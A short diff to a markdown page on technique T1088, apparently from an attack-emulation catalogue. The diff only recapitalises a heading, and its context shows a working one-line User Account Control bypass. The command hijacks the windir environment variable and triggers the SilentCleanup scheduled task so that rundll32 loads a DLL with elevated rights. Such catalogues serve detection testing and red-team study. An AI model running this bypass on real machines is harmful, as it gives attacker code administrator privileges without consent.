--- a/Techniques/T1088/T1088.md
+++ b/Techniques/T1088/T1088.md
@@ -7,7 +7,7 @@
 
 # Details
 
-## Exploiting Environment Variables in Schedule Tasks for User Account Control (UAC) Bypass
+## Exploiting environment variables in Scheduled Task for User Account Control (UAC) bypass
 
 ```
 reg add HKCU\Environment /v windir /d "rundll32 %APPDATA%\temp.txt,DllMain " /f&schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I & reg delete HKCU\Environment /v windir /f
